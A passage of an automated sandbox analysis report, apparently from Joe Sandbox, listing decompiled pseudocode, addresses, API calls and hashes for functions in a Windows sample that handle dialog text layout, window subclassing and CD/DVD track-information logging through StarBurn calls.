					_v80 = _v80 + 4;
					_t470 = _t470 + 4;
					_v76 = _v76 + 4;
				} while (_t378 != 0xb);
				_pop(_t441);
				 *[fs:eax] = _t441;
				_push(0x43dc82);
				return E00404A64( &_v112, 4);
			}





































































      0x0043d70c
      0x0043d717
      0x0043d71a
      0x0043d71d
      0x0043d720
      0x0043d723
      0x0043d727
      0x0043d72a
      0x0043d738
      0x0043d74f
      0x0043d75f
      0x0043d761
      0x0043d769
      0x0043d77c
      0x0043d784
      0x0043d78b
      0x0043d791
      0x0043d797
      0x0043d7ac
      0x0043d7b3
      0x0043d7be
      0x0043d7c3
      0x0043d7ce
      0x0043d7db
      0x0043d7e7
      0x0043d7f4
      0x0043d7f7
      0x0043d7f9
      0x0043d7fe
      0x0043d805
      0x0043d807
      0x0043d809
      0x0043d80e
      0x0043d80e
      0x0043d812
      0x0043d817
      0x0043d81f
      0x0043d825
      0x0043d82d
      0x0043d841
      0x0043d846
      0x0043d84e
      0x0043d862
      0x0043d870
      0x0043d870
      0x0043d872
      0x0043d877
      0x0043d879
      0x0043d879
      0x0043d877
      0x0043d87c
      0x0043d87d
      0x0043d881
      0x0043d884
      0x0043d884
      0x0043d89a
      0x0043d8aa
      0x0043d8ad
      0x0043d8bb
      0x0043d8bd
      0x0043d8bf
      0x0043d8bf
      0x0043d8cb
      0x0043d8d3
      0x0043d8e5
      0x0043d8ef
      0x0043d903
      0x0043d914
      0x0043d917
      0x0043d91d
      0x0043d924
      0x0043d929
      0x0043d92f
      0x0043d931
      0x0043d931
      0x0043d92f
      0x0043d938
      0x0043d93a
      0x0043d93c
      0x0043d93e
      0x0043d941
      0x0043d946
      0x0043d946
      0x0043d94a
      0x0043d94c
      0x0043d94c
      0x0043d94d
      0x0043d94e
      0x0043d953
      0x0043d957
      0x0043d963
      0x0043d963
      0x0043d97a
      0x0043d98d
      0x0043d992
      0x0043d9a5
      0x0043d9a7
      0x0043d9a9
      0x0043d9a9
      0x0043d9b2
      0x0043d9b4
      0x0043d9b6
      0x0043d9b6
      0x0043d9b9
      0x0043d9be
      0x0043d9d1
      0x0043d9d3
      0x0043d9d5
      0x0043d9d5
      0x0043d9de
      0x0043d9e0
      0x0043d9e2
      0x0043d9e2
      0x0043d9ea
      0x0043d9f3
      0x0043da19
      0x0043da20
      0x0043da2b
      0x0043d9f5
      0x0043da04
      0x0043da0f
      0x0043da0f
      0x0043da30
      0x0043da34
      0x0043da45
      0x0043da50
      0x0043da5a
      0x0043da68
      0x0043da6f
      0x0043da74
      0x0043da75
      0x0043da88
      0x0043da88
      0x0043da9d
      0x0043daa2
      0x0043dab1
      0x0043dabb
      0x0043dac2
      0x0043dacc
      0x0043dad6
      0x0043dae5
      0x0043daee
      0x0043dafe
      0x0043db0e
      0x0043db0e
      0x0043db23
      0x0043db2d
      0x0043db35
      0x0043db39
      0x0043db41
      0x0043db3b
      0x0043db3b
      0x0043db3b
      0x0043db2f
      0x0043db2f
      0x0043db2f
      0x0043db49
      0x0043db51
      0x0043db55
      0x0043db5d
      0x0043db57
      0x0043db57
      0x0043db57
      0x0043db4b
      0x0043db4b
      0x0043db4b
      0x0043db69
      0x0043db6b
      0x0043db6d
      0x0043db6f
      0x0043db6f
      0x0043db72
      0x0043db75
      0x0043db77
      0x0043db7e
      0x0043db83
      0x0043db8a
      0x0043db8c
      0x0043db8e
      0x0043db93
      0x0043db93
      0x0043db97
      0x0043dbac
      0x0043dbb9
      0x0043dbc4
      0x0043dbcc
      0x0043dbd7
      0x0043dbe4
      0x0043dbea
      0x0043dbed
      0x0043dbf4
      0x0043dbf4
      0x0043dbfc
      0x0043dc01
      0x0043dc01
      0x0043dc1f
      0x0043dc21
      0x0043dc2d
      0x0043dc33
      0x0043dc35
      0x0043dc3b
      0x0043dc41
      0x0043dc41
      0x0043dc33
      0x0043dc4b
      0x0043dc4c
      0x0043dc50
      0x0043dc53
      0x0043dc57
      0x0043dc62
      0x0043dc65
      0x0043dc68
      0x0043dc7a

      APIs
        • Part of subcall function 0043D230: SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 0043D26D
        • Part of subcall function 0043D230: CreateFontIndirectA.GDI32(?), ref: 0043D27A
        • Part of subcall function 0043D064: GetTextExtentPointA.GDI32(00000000,00000034,00000034,?), ref: 0043D09F
      • MulDiv.KERNEL32(00000008,?,00000004), ref: 0043D7B9
      • MulDiv.KERNEL32(00000008,?,00000008), ref: 0043D7C9
      • MulDiv.KERNEL32(0000000A,?,00000004), ref: 0043D7D6
      • MulDiv.KERNEL32(0000000A,?,00000008), ref: 0043D7E2
      • MulDiv.KERNEL32(00000032,?,00000004), ref: 0043D7EF
      • DrawTextA.USER32(00000000,00000000,000000FF,?,00000000), ref: 0043D862
      • MulDiv.KERNEL32(0000000E,?,00000008), ref: 0043D895
      • MulDiv.KERNEL32(00000004,?,00000004), ref: 0043D8A5
      • SetRect.USER32 ref: 0043D8CB
      • DrawTextA.USER32(00000000,00000000,00000001,?,00000000), ref: 0043D903
      • LoadIconA.USER32(00000000,00000000), ref: 0043DA63
        • Part of subcall function 00464138: GetWindowTextA.USER32 ref: 0046415B
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Text$Draw$CreateExtentFontIconIndirectInfoLoadParametersPointRectSystemWindow
      • String ID: $H>C$Image$Message$PH
      • API String ID: 4220236395-1574829860
      • Opcode ID: 59bc8712a043cca482d1eaa4f5823f5e7f1a5328afa06a34fb6279799cb0cf52
      • Instruction ID: 5145ca98db5378cdaef32ba7da3508233253f49cb8f783695730ee707ff58968
      • Opcode Fuzzy Hash: 59bc8712a043cca482d1eaa4f5823f5e7f1a5328afa06a34fb6279799cb0cf52
      • Instruction Fuzzy Hash: 82024C75E002089FDB00EFA9D885B9DB7F5FF49308F14816AE914AB352C778AD05CB59
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0047AED0 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 238windowCOMMON
      Download Yara Rule
      C-Code - Quality: 83%
      			E0047AED0(intOrPtr __eax, void* __ebx, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				char* _t106;
				intOrPtr _t118;
				intOrPtr _t119;
				intOrPtr* _t133;
				long _t140;
				intOrPtr _t166;
				struct HWND__* _t195;
				long _t196;
				void* _t198;
				void* _t199;
				struct HWND__* _t200;
				void* _t201;
				intOrPtr _t212;
				intOrPtr _t214;
				intOrPtr _t218;
				struct HWND__* _t224;
				void* _t225;
				struct HWND__* _t226;
				struct HWND__* _t227;
				void* _t229;
				void* _t230;
				intOrPtr _t231;

				_t229 = _t230;
				_t231 = _t230 + 0xfffffff8;
				_v12 = 0;
				_v8 = __eax;
				_push(_t229);
				_push(0x47b1e3);
				_push( *[fs:eax]);
				 *[fs:eax] = _t231;
				E00437414(_v8);
				_t195 = GetWindow(E0044B158(_v8), 5);
				 *(_v8 + 0x248) = _t195;
				_t224 = _t195;
				 *(_v8 + 0x270) = _t224;
				 *((intOrPtr*)(_v8 + 0x274)) = GetWindowLongA(_t224, 0xfffffffc);
				SetWindowLongA( *(_v8 + 0x270), 0xfffffffc,  *(_v8 + 0x278));
				if( *((intOrPtr*)(_v8 + 0x289)) - 2 < 0) {
					_t200 = GetWindow(GetWindow(E0044B158(_v8), 5), 5);
					if(_t200 != 0) {
						if( *((char*)(_v8 + 0x289)) == 1) {
							_t227 = _t200;
							 *(_v8 + 0x244) = _t227;
							 *((intOrPtr*)(_v8 + 0x258)) = GetWindowLongA(_t227, 0xfffffffc);
							SetWindowLongA( *(_v8 + 0x244), 0xfffffffc,  *(_v8 + 0x254));
							_t200 = GetWindow(_t200, 2);
						}
						_t226 = _t200;
						 *(_v8 + 0x240) = _t226;
						 *((intOrPtr*)(_v8 + 0x250)) = GetWindowLongA(_t226, 0xfffffffc);
						SetWindowLongA( *(_v8 + 0x240), 0xfffffffc,  *(_v8 + 0x24c));
					}
				}
				_t106 =  *0x48f73c; // 0x490ae0
				if( *_t106 != 0 &&  *(_v8 + 0x240) != 0) {
					SendMessageA( *(_v8 + 0x240), 0xd3, 3, 0);
				}
				if( *((intOrPtr*)(_v8 + 0x284)) == 0) {
					__eflags =  *((intOrPtr*)(_v8 + 0x280));
					if(__eflags != 0) {
						_t140 = E00451B70( *((intOrPtr*)(_v8 + 0x280)));
						PostMessageA(E0044B158(_v8), 0x402, 0, _t140);
					}
					E0047B21C(_v8, _t201,  *((intOrPtr*)(_v8 + 0x28a)), __eflags);
					E00406578(_v8 + 0x268);
					_push(E00406578(_v8 + 0x268));
					_push(0x47b1f0);
					_push(1);
					_push(0);
					_t118 =  *0x48f560; // 0x48e924
					_push(_t118);
					L00416C3C();
					_t119 = _v8;
					__eflags =  *((intOrPtr*)(_t119 + 0x268));
					if( *((intOrPtr*)(_t119 + 0x268)) != 0) {
						_t196 = SendMessageA(E0044B158(_v8), 0x407, 0, 0);
						__eflags = _t196;
						if(_t196 != 0) {
							_t214 = E0047BA8C( *((intOrPtr*)(_v8 + 0x28c)), 1);
							__eflags = _t214;
							if(_t214 != 0) {
								__eflags = _t214;
							}
							E00406590( &_v12, _t214);
							_t133 =  *((intOrPtr*)(_v8 + 0x268));
							 *((intOrPtr*)( *_t133 + 0xc))(_t133, _t196, _v12, 0, 0);
							E0047B3B0(_v8, _t196, __eflags);
						}
					}
					__eflags = 0;
					_pop(_t212);
					 *[fs:eax] = _t212;
					_push(0x47b1ea);
					return E00406578( &_v12);
				} else {
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x28c)))) + 0x20))();
					 *((char*)(_v8 + 0x288)) = 1;
					 *[fs:eax] = _t231;
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x28c)))) + 8))( *[fs:eax], 0x47b0e7, _t229);
					_t198 = E0041A9F0( *((intOrPtr*)(_v8 + 0x28c))) - 1;
					if(_t198 >= 0) {
						_t199 = _t198 + 1;
						_t225 = 0;
						do {
							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x28c)))) + 0x2c))();
							_t225 = _t225 + 1;
							_t199 = _t199 - 1;
						} while (_t199 != 0);
					}
					E0040E7F0(_v8 + 0x284);
					E00444A1C(_v8);
					_pop(_t218);
					 *[fs:eax] = _t218;
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x28c)))) + 0x24))(0x47b0ee);
					_t166 = _v8;
					 *((char*)(_t166 + 0x288)) = 0;
					return _t166;
				}
			}



























      0x0047aed1
      0x0047aed3
      0x0047aeda
      0x0047aedd
      0x0047aee2
      0x0047aee3
      0x0047aee8
      0x0047aeeb
      0x0047aef1
      0x0047af06
      0x0047af0b
      0x0047af11
      0x0047af16
      0x0047af27
      0x0047af43
      0x0047af53
      0x0047af71
      0x0047af75
      0x0047af85
      0x0047af8a
      0x0047af8c
      0x0047af9d
      0x0047afb9
      0x0047afc6
      0x0047afc6
      0x0047afcb
      0x0047afcd
      0x0047afde
      0x0047affa
      0x0047affa
      0x0047af75
      0x0047afff
      0x0047b007
      0x0047b028
      0x0047b028
      0x0047b037
      0x0047b0f1
      0x0047b0f8
      0x0047b103
      0x0047b119
      0x0047b119
      0x0047b12a
      0x0047b137
      0x0047b149
      0x0047b14a
      0x0047b14f
      0x0047b151
      0x0047b153
      0x0047b158
      0x0047b159
      0x0047b15e
      0x0047b161
      0x0047b168
      0x0047b181
      0x0047b183
      0x0047b185
      0x0047b19c
      0x0047b19e
      0x0047b1a0
      0x0047b1a2
      0x0047b1a2
      0x0047b1a8
      0x0047b1b9
      0x0047b1c2
      0x0047b1c8
      0x0047b1c8
      0x0047b185
      0x0047b1cd
      0x0047b1cf
      0x0047b1d2
      0x0047b1d5
      0x0047b1e2
      0x0047b03d
      0x0047b048
      0x0047b04e
      0x0047b060
      0x0047b077
      0x0047b08a
      0x0047b08d
      0x0047b08f
      0x0047b090
      0x0047b092
      0x0047b09f
      0x0047b0a2
      0x0047b0a3
      0x0047b0a3
      0x0047b092
      0x0047b0ae
      0x0047b0bc
      0x0047b0c3
      0x0047b0c6
      0x0047b0d9
      0x0047b0dc
      0x0047b0df
      0x0047b0e6
      0x0047b0e6

      APIs
        • Part of subcall function 00437414: SendMessageA.USER32 ref: 00437434
      • GetWindow.USER32(00000000,00000005), ref: 0047AF01
      • GetWindowLongA.USER32 ref: 0047AF1F
      • SetWindowLongA.USER32 ref: 0047AF43
      • GetWindow.USER32(00000000,00000005), ref: 0047AF66
      • GetWindow.USER32(00000000,00000000), ref: 0047AF6C
      • GetWindowLongA.USER32 ref: 0047AF95
      • SetWindowLongA.USER32 ref: 0047AFB9
      • GetWindow.USER32(00000000,00000002), ref: 0047AFC1
      • GetWindowLongA.USER32 ref: 0047AFD6
      • SetWindowLongA.USER32 ref: 0047AFFA
      • SendMessageA.USER32 ref: 0047B028
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Window$Long$MessageSend
      • String ID: $H$I
      • API String ID: 1593136606-2099304830
      • Opcode ID: bcf13a1ae3382ab1771d33baf1555ec2df65b1ac381bff32b6cd555f344e0498
      • Instruction ID: bace3c43233f04fd3bf2143661fb30d7aebbb9edc71341416dae43d948594c51
      • Opcode Fuzzy Hash: bcf13a1ae3382ab1771d33baf1555ec2df65b1ac381bff32b6cd555f344e0498
      • Instruction Fuzzy Hash: 37A1EC74A04104EFD710EBA9C989F9E77F5EB08304F2581B5F508AB3A2CB74AE44DB58
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00487544 Relevance: 24.9, APIs: 3, Strings: 11, Instructions: 430COMMON
      Download Yara Rule
      C-Code - Quality: 78%
      			E00487544(intOrPtr __eax, void* __ebx, void* __edx, void* __edi, void* __esi, long long __fp0) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v33;
				intOrPtr _v35;
				void* _v43;
				void _v44;
				char _v13870;
				void* _v13872;
				char _v13882;
				char _v13888;
				char _v13892;
				intOrPtr _v13896;
				char _v13900;
				intOrPtr _v13904;
				char _v13908;
				char _v13912;
				char _v13916;
				char _v13920;
				intOrPtr _v13924;
				char _v13928;
				intOrPtr _v13932;
				char _v13936;
				intOrPtr _v13940;
				char _v13944;
				intOrPtr _v13948;
				char _v13952;
				char _v13956;
				char _v13960;
				char _v13964;
				char _v13968;
				char _v13972;
				char _v13976;
				char _v13980;
				char _v13984;
				char _v13988;
				char _v13992;
				char _v13996;
				intOrPtr _v14000;
				char _v14004;
				intOrPtr _v14008;
				char _v14012;
				intOrPtr _v14016;
				char _v14020;
				intOrPtr _v14024;
				char _v14028;
				intOrPtr _v14032;
				char _v14036;
				intOrPtr _v14040;
				char _v14044;
				intOrPtr _v14048;
				char _v14052;
				char _v14056;
				char _v14060;
				char _v14064;
				intOrPtr _v14068;
				char _v14072;
				intOrPtr _v14076;
				char _v14080;
				intOrPtr _v14084;
				char _v14088;
				char _v14092;
				char _v14096;
				char _v14100;
				char _v14104;
				char _v14108;
				char _v14112;
				char _v14116;
				char _v14120;
				char _v14124;
				char _v14128;
				intOrPtr* _t221;
				char _t228;
				intOrPtr* _t242;
				char _t250;
				intOrPtr _t251;
				intOrPtr* _t263;
				intOrPtr* _t285;
				intOrPtr* _t305;
				intOrPtr* _t322;
				intOrPtr* _t335;
				intOrPtr* _t388;
				intOrPtr _t394;
				void* _t395;
				void* _t396;
				intOrPtr _t433;
				char _t465;
				intOrPtr _t467;
				void* _t479;
				void* _t483;
				void* _t488;
				void* _t490;
				intOrPtr _t493;
				intOrPtr _t494;
				long long _t512;

				_t512 = __fp0;
				_t478 = __edi;
				_t493 = _t494;
				_t396 = 0x6e5;
				do {
					_push(0);
					_push(0);
					_t396 = _t396 - 1;
				} while (_t396 != 0);
				_push(_t396);
				_push(__ebx);
				_push(__edi);
				_t488 = __edx;
				_v8 = __eax;
				_push(_t493);
				_push(0x487c55);
				_push( *[fs:eax]);
				 *[fs:eax] = _t494;
				E0041A94C(_v8);
				_push(1);
				L00465EFC();
				_t221 =  *0x48f538; // 0x490c50
				E0047FD7C( *_t221, __ebx, 0, "CdvdBurnerGrabber_GetTOCInformation", __edi, _t488, __fp0);
				_push( &_v13882);
				_push(_t488 + 0x4e8);
				_push(_t488 + 0xe4);
				_push(0x400);
				_push(_t488 + 0xe8);
				_t228 =  *((intOrPtr*)(_t488 + 0xd8));
				_push(_t228);
				L00465EAC();
				 *((char*)(_t488 + 0xe0)) = _t228;
				_t394 =  *((intOrPtr*)(_t488 + 0xe0));
				if(_t394 != 0 && _t394 != 8) {
					_v13912 = 0;
					_v13908 = 0;
					_v13904 =  *((intOrPtr*)(_t488 + 0xe4));
					_v13900 = 0;
					_v13896 = _t488 + 0xe8;
					_v13892 = 6;
					E0040A164("StarBurn_CdvdBurnerGrabber_GetTOCInformation() failed, exception %d, status %d, text \"%s\"", 2,  &_v13912,  &_v13888);
					E00404A94(_t488 + 4, _v13888);
					_t388 =  *0x48f538; // 0x490c50
					E0047FD7C( *_t388, _t394, 0,  *((intOrPtr*)(_t488 + 4)), __edi, _t488, __fp0);
					E0040CBEC( *((intOrPtr*)(_t488 + 4)), 1);
					E004043D0();
				}
				if( *((char*)(_t488 + 0xe0)) == 0 && 0 > 0) {
					_v16 = 0;
					_v12 = 1;
					_t395 =  &_v13870;
					do {
						if(0 != _v12) {
							goto L11;
						} else {
							_t251 =  *((intOrPtr*)(_t488 + 0x71));
							if(_t251 != 0xd && _t251 != 5) {
								goto L11;
							}
						}
						goto L18;
						L11:
						_t242 =  *0x48f538; // 0x490c50
						E0047FD7C( *_t242, _t395, 0, "CdvdBurnerGrabber_GetTrackInformation", _t478, _t488, _t512);
						_push( &_v44);
						_push(_v12);
						_push(_t488 + 0x4e8);
						_push(_t488 + 0xe4);
						_push(0x400);
						_push(_t488 + 0xe8);
						_t250 =  *((intOrPtr*)(_t488 + 0xd8));
						_push(_t250);
						L00465E9C();
						 *((char*)(_t488 + 0xe0)) = _t250;
						if( *((char*)(_t488 + 0xe0)) == 0) {
							if(_v44 != 0) {
								_t479 = E0047F864(_v8);
								memcpy(_t479 + 0xc,  &_v44, 7 << 2);
								_t483 = _t479;
								_t490 = _t488;
								memcpy(_t483 + 0x28, _t395, 8 << 2);
								_t494 = _t494 + 0x18;
								asm("movsw");
								_t478 = _t483;
								_t488 = _t490;
								E004662CC(_v35,  &_v13960, 1);
								_v13956 = _v13960;
								_v13952 = 0xb;
								E004662CC(_v33,  &_v13964, 1);
								_v13948 = _v13964;
								_v13944 = 0xb;
								_v13940 = _v24;
								_v13936 = 0;
								_v13932 = _v28;
								_v13928 = 0;
								_v13924 = 0;
								_v13920 = 0;
								E0040A164("Track Blank: %s, NWA valid: %s, free LBs %d, NWA %d, track number %d", 4,  &_v13956,  &_v13916);
								_t465 = _v13916;
								E00404A94(_t488 + 4, _t465);
								asm("cdq");
								 *((intOrPtr*)(_t478 + 0x58)) =  *((intOrPtr*)(_t478 + 0x32)) -  *((intOrPtr*)(_t478 + 0x2b));
								 *((intOrPtr*)(_t478 + 0x5c)) = _t465;
								_t467 =  *((intOrPtr*)(_t478 + 0x5c));
								 *((intOrPtr*)(_t478 + 0x60)) = E00405938( *((intOrPtr*)(_t478 + 0x58)), _t467,  *((intOrPtr*)(_t478 + 0x42)), 0);
								 *((intOrPtr*)(_t478 + 0x64)) = _t467;
								if( *((char*)(_t478 + 0x3e)) != 0) {
									E0047C474( *((intOrPtr*)(_t478 + 0x60)), _t512);
									 *((long long*)(_t478 + 0x68)) = _t512;
									asm("wait");
								}
								_push("Size: ");
								E00466310(0,  &_v13968, _t512,  *((intOrPtr*)(_t478 + 0x60)),  *((intOrPtr*)(_t478 + 0x64)));
								_push(_v13968);
								_push(0x487d8c);
								E004662CC(_v35,  &_v13976, 1);
								_v13912 = _v13976;
								_v13908 = 0xb;
								_v13904 = _v24;
								_v13900 = 0;
								_v13896 = 0;
								_v13892 = 0;
								E0040A164("Track Blank: %s, free LBs %d, track number %d", 2,  &_v13912,  &_v13972);
								_push(_v13972);
								E00404DC0();
								_push("Size: ");
								E00466310(0,  &_v13980, _t512,  *((intOrPtr*)(_t478 + 0x60)),  *((intOrPtr*)(_t478 + 0x64)));
								_push(_v13980);
								_push(0x487d8c);
								_push( *((intOrPtr*)(_t488 + 4)));
								E00404DC0();
							}
							_v13912 = _v12;
							_v13908 = 0;
							_v13904 = 0;
							_v13900 = 0;
							E004662CC( *_t395,  &_v13988, 1);
							_v13896 = _v13988;
							_v13892 = 0xb;
							E0040A164("TOC Index %d, Track Number: 0x%02X, Entry Valid: %s", 2,  &_v13912,  &_v13984);
							E00404A94(_t488 + 4, _v13984);
							_t263 =  *0x48f538; // 0x490c50
							E0047FD7C( *_t263, _t395, 0,  *((intOrPtr*)(_t488 + 4)), _t478, _t488, _t512);
							_v14056 =  *((intOrPtr*)(_t395 + 3));
							_v14052 = 0;
							_v14048 = 0;
							_v14044 = 0;
							_v14040 = 0;
							_v14036 = 0;
							_v14032 = 0;
							_v14028 = 0;
							_v14024 =  *((intOrPtr*)(_t395 + 0xa));
							_v14020 = 0;
							_v14016 = 0;
							_v14012 = 0;
							_v14008 = 0;
							_v14004 = 0;
							_v14000 = 0;
							_v13996 = 0;
							E0040A164("Starting LBA %d, Starting MSF %d:%d:%d, Ending LBA %d, Ending MSF %d:%d:%d", 7,  &_v14056,  &_v13992);
							E00404A94(_t488 + 4, _v13992);
							_t285 =  *0x48f538; // 0x490c50
							E0047FD7C( *_t285, _t395, 0,  *((intOrPtr*)(_t488 + 4)), _t478, _t488, _t512);
							E004662CC( *((intOrPtr*)(_t395 + 0x11)),  &_v14096, 1);
							_v14092 = _v14096;
							_v14088 = 0xb;
							E004662CC( *((intOrPtr*)(_t395 + 0x12)),  &_v14100, 1);
							_v14084 = _v14100;
							_v14080 = 0xb;
							E004662CC( *((intOrPtr*)(_t395 + 0x13)),  &_v14104, 1);
							_v14076 = _v14104;
							_v14072 = 0xb;
							E004662CC( *((intOrPtr*)(_t395 + 0x14)),  &_v14108, 1);
							_v14068 = _v14108;
							_v14064 = 0xb;
							E0040A164("MCN Available: %s, ISRC Available: %s, Four Channels Audio: %s, Pre-Emphasis Audio: %s", 3,  &_v14092,  &_v14060);
							E00404A94(_t488 + 4, _v14060);
							_t305 =  *0x48f538; // 0x490c50
							E0047FD7C( *_t305, _t395, 0,  *((intOrPtr*)(_t488 + 4)), _t478, _t488, _t512);
							E004662CC( *((intOrPtr*)(_t395 + 0x15)),  &_v14116, 1);
							_v13912 = _v14116;
							_v13908 = 0xb;
							E004662CC( *((intOrPtr*)(_t395 + 0x16)),  &_v14120, 1);
							_v13904 = _v14120;
							_v13900 = 0xb;
							E004662CC( *((intOrPtr*)(_t395 + 0x17)),  &_v14124, 1);
							_v13896 = _v14124;
							_v13892 = 0xb;
							E0040A164("Data: %s, Audio: %s, Digital Copy Prohibited: %s", 2,  &_v13912,  &_v14112);
							E00404A94(_t488 + 4, _v14112);
							_t322 =  *0x48f538; // 0x490c50
							E0047FD7C( *_t322, _t395, 0,  *((intOrPtr*)(_t488 + 4)), _t478, _t488, _t512);
							_v13912 = 0;
							_v13908 = 0;
							_v13904 = 0;
							_v13900 = 0;
							_v13896 =  *((intOrPtr*)(_t395 + 0x1a));
							_v13892 = 0;
							E0040A164("Track Mode: 0x%02X, MODE2 Form: 0x%02X (if Track Mode = 0x02), LB (logical block) Size In UCHARs: %d", 2,  &_v13912,  &_v14128);
							E00404A94(_t488 + 4, _v14128);
							_t335 =  *0x48f538; // 0x490c50
							E0047FD7C( *_t335, _t395, 0,  *((intOrPtr*)(_t488 + 4)), _t478, _t488, _t512);
						}
						_v12 = _v12 + 1;
						_t395 = _t395 + 0x22;
						_t210 =  &_v16;
						 *_t210 = _v16 - 1;
					} while ( *_t210 != 0);
				}
				L18:
				_pop(_t433);
				 *[fs:eax] = _t433;
				_push(0x487c5c);
				E00404A64( &_v14128, 9);
				E00404A40( &_v14060);
				E00404A64( &_v13992, 9);
				E00404A40( &_v13916);
				return E00404A40( &_v13888);
			}




































































































      0x00487544
      0x00487544
      0x00487545
      0x00487547
      0x0048754c
      0x0048754c
      0x0048754e
      0x00487550
      0x00487550
      0x00487553
      0x00487554
      0x00487556
      0x00487557
      0x00487559
      0x0048755e
      0x0048755f
      0x00487564
      0x00487567
      0x0048756d
      0x00487572
      0x00487574
      0x00487579
      0x00487587
      0x00487592
      0x00487599
      0x004875a0
      0x004875a1
      0x004875ac
      0x004875ad
      0x004875b3
      0x004875b4
      0x004875b9
      0x004875bf
      0x004875c7
      0x004875e1
      0x004875e7
      0x004875f4
      0x004875fa
      0x00487607
      0x0048760d
      0x00487624
      0x00487632
      0x00487637
      0x00487643
      0x00487652
      0x00487657
      0x00487657
      0x00487663
      0x00487679
      0x0048767c
      0x00487683
      0x00487689
      0x00487694
      0x00000000
      0x00487696
      0x00487696
      0x0048769b
      0x00000000
      0x00000000
      0x0048769b
      0x00000000
      0x004876a9
      0x004876a9
      0x004876b7
      0x004876bf
      0x004876c3
      0x004876ca
      0x004876d1
      0x004876d2
      0x004876dd
      0x004876de
      0x004876e4
      0x004876e5
      0x004876ea
      0x004876f7
      0x00487701
      0x0048770f
      0x0048771e
      0x00487720
      0x00487721
      0x0048772e
      0x0048772e
      0x00487730
      0x00487732
      0x00487733
      0x00487746
      0x00487751
      0x00487757
      0x00487769
      0x00487774
      0x0048777a
      0x00487784
      0x0048778a
      0x00487794
      0x0048779a
      0x004877a6
      0x004877ac
      0x004877c3
      0x004877c8
      0x004877d1
      0x004877dc
      0x004877dd
      0x004877e0
      0x004877ed
      0x004877f5
      0x004877f8
      0x004877ff
      0x00487804
      0x00487809
      0x0048780c
      0x0048780c
      0x0048780d
      0x00487820
      0x00487825
      0x0048782b
      0x00487842
      0x0048784d
      0x00487853
      0x0048785d
      0x00487863
      0x0048786f
      0x00487875
      0x0048788c
      0x00487891
      0x0048789f
      0x004878a4
      0x004878b7
      0x004878bc
      0x004878c2
      0x004878c7
      0x004878d2
      0x004878d2
      0x004878e1
      0x004878e7
      0x004878f3
      0x004878f9
      0x0048790a
      0x00487915
      0x0048791b
      0x00487932
      0x00487940
      0x00487945
      0x00487951
      0x00487960
      0x00487966
      0x00487972
      0x00487978
      0x00487984
      0x0048798a
      0x00487996
      0x0048799c
      0x004879a6
      0x004879ac
      0x004879b8
      0x004879be
      0x004879ca
      0x004879d0
      0x004879dc
      0x004879e2
      0x004879f9
      0x00487a07
      0x00487a0c
      0x00487a18
      0x00487a2f
      0x00487a3a
      0x00487a40
      0x00487a52
      0x00487a5d
      0x00487a63
      0x00487a75
      0x00487a80
      0x00487a86
      0x00487a98
      0x00487aa3
      0x00487aa9
      0x00487ac0
      0x00487ace
      0x00487ad3
      0x00487adf
      0x00487af6
      0x00487b01
      0x00487b07
      0x00487b19
      0x00487b24
      0x00487b2a
      0x00487b3c
      0x00487b47
      0x00487b4d
      0x00487b64
      0x00487b72
      0x00487b77
      0x00487b83
      0x00487b94
      0x00487b9a
      0x00487ba6
      0x00487bac
      0x00487bb6
      0x00487bbc
      0x00487bd3
      0x00487be1
      0x00487be6
      0x00487bf2
      0x00487bf2
      0x00487bf7
      0x00487bfa
      0x00487bfd
